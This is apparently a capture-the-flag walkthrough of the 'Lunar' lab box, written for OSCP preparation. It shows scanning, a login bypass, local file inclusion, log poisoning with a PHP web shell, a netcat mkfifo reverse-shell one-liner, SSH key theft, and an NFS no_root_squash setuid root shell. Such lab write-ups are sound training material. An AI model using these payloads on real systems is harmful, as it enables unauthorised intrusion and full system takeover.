Proving grounds:Lunar
Today we will take a look at Proving grounds: Lunar. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1994b952225ed0f8520d363b448bbcf (RSA)
| 256 0f448badad95b8226af036ac19d00ef3 (ECDSA)
|_ 256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Lunar Studio
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 52125/tcp mountd
| 100005 1,2,3 60293/udp mountd
| 100021 1,3,4 44323/tcp nlockmgr
| 100021 1,3,4 59142/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
40609/tcp open rpcbind
44323/tcp open nlockmgr 1-4 (RPC #100021)
52125/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- 80 (apache)
When scanning with Nikto, find the backup.zip file
└─$ nikto -h http://192.168.60.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.60.216
+ Target Hostname: 192.168.60.216
+ Target Port: 80
+ Start Time: 2023-01-20 10:57:10 (GMT4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Server may leak inodes via ETags, header found with file /, inode: 49b7, size: 5ddbc015cc380, mtime: gzip
+ /backup.zip: Potentially interesting archive/cert file found.
You can also find it in Feroxbuster
200 GET 0l 0w 1265712c http://192.168.60.216/backup.zip
Login.php
We see the source codes in the login.php file extracted from the backup.zip file. from here we get the email address, and next to the password we see the strcmp function
if ($_POST[‘email’] && !empty($_POST[‘email’]) && $_POST[‘email’] === ‘liam@lunar.local’ && strcmp($_POST[‘password’], $pwd) == 0) {
bypass and enter dashboard.php
Dashboard.php
Here we see that we can read files with the ext parameter
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['show'])) {
if(containsStr($_GET['show'], 'pending') || containsStr($_GET['show'], 'completed')) {
error_reporting(E_ALL ^ E_WARNING);
include $_GET['show'] . $ext;
} else {
echo 'You can select either one of these only';
Check the /etc/passwd file with lfi
$url/dashboard.php?show=completed&ext=../../../../../etc/passwd
Check the access.log file for log poisoning
URL/dashboard.php?show=completed&ext=../../../../../var/log/apache2/access.log
Now let’s enter the poison, enter the cmd parameter
└─$ nc 192.168.60.216 80
GET /<?php system($_GET['cmd']); ?>
RCE
Payload
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
Don’t forget to convert the url format
URL/dashboard.php?show=completed&ext=../../../../../var/log/apache2/access.log&cmd=rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.49.60%20443%20%3E%2Ftmp%2Ff
Reverse shell and access to www-data
- liam
Linpeas?
See liam’s id_rsa file, save it and login
└─$ vim liam
└─$ chmod 600 liam
─$ ssh liam@192.168.60.216 -i liam
$ script /dev/null -c bash
Script started, file is /dev/null
- Privesc (no_root_squash)
here we see that we can distribute nfs file only on localhost, for that we add our ip in /etc/hosts file.
liam@lunar:~$ echo "192.168.49.60 localhost" >> /etc/hosts
liam@lunar:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.0.1 lunar
192.168.49.60 localhost
Preparing our payload and sending it inside
└─$ mkdir tmp
┌──(kali㉿kali)-[~/OSCP/lab/nfs]
└─$ sudo mount -t nfs 192.168.60.216:/srv/share tmp -o nolock
[sudo] password for kali:
┌──(kali㉿kali)-[~/OSCP/lab/nfs]
└─$ ls
tmp
┌──(kali㉿kali)-[~/OSCP/lab/nfs]
└─$ cd tmp
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ ls
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ cat > shell.c<<EOF
#include <unistd.h>
int main(){
setuid(0);
setgid(0);
system("/bin/bash");
}
EOF
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ sudo gcc -static shell.c -o shell
shell.c: In function ‘main’:
shell.c:5:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
5 | system("/bin/bash");
| ^~~~~~
┌──(kali㉿kali)-[~/OSCP/lab/nfs/tmp]
└─$ sudo chmod u+s shell
Run the shell
liam@lunar:~$ cd /srv
liam@lunar:/srv$ cd share
liam@lunar:/srv/share$ ls
shell shell.c
liam@lunar:/srv/share$ ./shell
root@lunar:/srv/share# whoami
root
root@lunar:/srv/share#
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”